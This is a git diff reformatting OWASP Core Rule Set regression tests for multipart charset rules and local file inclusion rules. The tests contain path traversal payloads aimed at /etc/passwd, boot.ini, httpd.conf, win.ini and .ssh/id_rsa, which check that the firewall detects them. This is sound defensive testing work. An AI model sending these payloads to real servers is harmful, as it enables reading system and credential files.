User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml index f1eeae421..df7716d78 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml @@ -2,90 +2,86 @@ meta: author: "Felipe Zipitria, Max Leske" description: Test Multipart/form-data - enabled: true - name: 922100.yaml +rule_id: 922100 tests: - - test_title: 922100-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-7 - --boundary - Content-disposition: form-data; name="positive" - Content-Type: text/plain + utf-7 + --boundary + Content-disposition: form-data; name="positive" + Content-Type: text/plain - Let me see if I can use utf-7. - --boundary-- - output: - log_contains: id "922100" - - test_title: 922100-2 + Let me see if I can use utf-7. + --boundary-- + output: + log_contains: id "922100" + - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as we use utf-8 that is allowed. - --boundary-- - output: - no_log_contains: id "922100" - - test_title: 922100-3 + This should be good as we use utf-8 that is allowed. + --boundary-- + output: + no_log_contains: id "922100" + - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf- - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf- + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - utf-8 is valid but utf- should not be. - --boundary-- - output: - log_contains: id "922100" + utf-8 is valid but utf- should not be. + --boundary-- + output: + log_contains: id "922100" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml index 72e8f269b..ab02ff01a 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml @@ -2,62 +2,59 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922110.yaml +rule_id: 922110 tests: - - test_title: 922110-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="922110" - Content-Type: text/plain; charset=utf-7 + utf-8 + --boundary + Content-disposition: form-data; name="922110" + Content-Type: text/plain; charset=utf-7 - Knock knock. - --boundary-- - output: - log_contains: id "922110" - - test_title: 922110-2 + Knock knock. + --boundary-- + output: + log_contains: id "922110" + - test_id: 2 desc: "Negative test: utf-8 is allowed" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain; charset=utf-8 + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain; charset=utf-8 - I shold be allowed to get in. - --boundary-- - output: - no_log_contains: id "922110" + I shold be allowed to get in. + --boundary-- + output: + no_log_contains: id "922110" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml index 71e447a6f..c3d6693a2 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml @@ -2,55 +2,52 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922120.yaml +rule_id: 922120 tests: - - test_title: 922120-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-Disposition: form-data; name="flavors" - Content-Transfer-Encoding: 8bit - Content-Type: text/plain; charset=utf-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-Disposition: form-data; name="flavors" + Content-Transfer-Encoding: 8bit + Content-Type: text/plain; charset=utf-7 - Pineapple. Pizza. - --boundary-- - output: - log_contains: id "922120" - - test_title: 922120-2 + Pineapple. Pizza. + --boundary-- + output: + log_contains: id "922120" + - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as there is no content-transfer-encoding header. - --boundary-- - output: - no_log_contains: id "922120" + This should be good as there is no content-transfer-encoding header. + --boundary-- + output: + no_log_contains: id "922120" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml index 276aa07f9..8a35994d4 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml @@ -1,73 +1,68 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930100.yaml" description: "Application attack LFI" +rule_id: 930100 tests: - - test_title: 930100-1 + - test_id: 1 desc: "Path Traversal Attack (/../) encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e.%00/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e.%00/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=.../.../WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=.../.../WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" + version: "HTTP/1.1" + output: + log_contains: id "930100" + - test_id: 4 desc: "Status Page Test - Path Traversal Attack (../), partially encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e./" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e./" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930100" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index 2a0e587e7..75eccd74a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml @@ -1,219 +1,206 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930110.yaml" description: "Application attacks: Local file include" +rule_id: 930110 tests: - - test_title: 930110-1 + - test_id: 1 desc: "Path Traversal Attack (/../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "/../../../././..\\ ../../etc/master.passwd" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?arg=../../../etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-3 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?arg=../../../etc/passwd" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "arg=../../../etc/passwd&foo=var" - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-4 + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "arg=../../../etc/passwd&foo=var" + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo../1234" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/foo.../1234" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-6 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/foo.../1234" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/..foo" - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-7 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/..foo" + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 7 desc: "Path Traversal Attack (/../) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/.." - version: "HTTP/1.1" - output: - no_log_contains: id "930110" - - test_title: 930110-8 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/.." + version: "HTTP/1.1" + output: + no_log_contains: id "930110" + - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?arg=..\pineapple' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-9 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?arg=..\pineapple' + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: '/get?foo=.../.../WINDOWS/win.ini' - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-10 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/get?foo=.../.../WINDOWS/win.ini' + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="../1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="../1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-11 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages: - - stage: - input: - dest_addr: "localhost" - method: "POST" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - uri: "/post" - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="file"; filename="..\1.7z" - Content-Type: application/octet-stream + - input: + dest_addr: "localhost" + method: "POST" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + uri: "/post" + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="file"; filename="..\1.7z" + Content-Type: application/octet-stream - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - version: "HTTP/1.1" - output: - log_contains: id "930110" - - test_title: 930110-12 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + version: "HTTP/1.1" + output: + log_contains: id "930110" + - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - Host: "localhost" - X-FTW: "This should trip" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + Host: "localhost" + X-FTW: "This should trip" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/get?a=..;.\\.;\\." - version: "HTTP/1.1" - output: - log_contains: id "930110" + version: "HTTP/1.1" + output: + log_contains: id "930110" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3e99e2d10..e9ead764a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -2,185 +2,173 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 930120.yaml tests: - - test_title: 930120-1 + - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=/etc/passwd%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=/etc/passwd%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 4 desc: "OS File Access" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?foo=arg&path_comp=.ssh/id_rsa" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?foo=arg&path_comp=.ssh/id_rsa" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 5 desc: "LFI via parameter name: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?/sys/class=test" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?/sys/class=test" + version: "HTTP/1.1" + output: + log_contains: id "930120" + - test_id: 6 desc: "LFI via parameter value: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?test=/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930120" - - test_title: 930120-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?test=/sys/class" + version: "HTTP/1.1" + output: + log_contains: id "930120" + 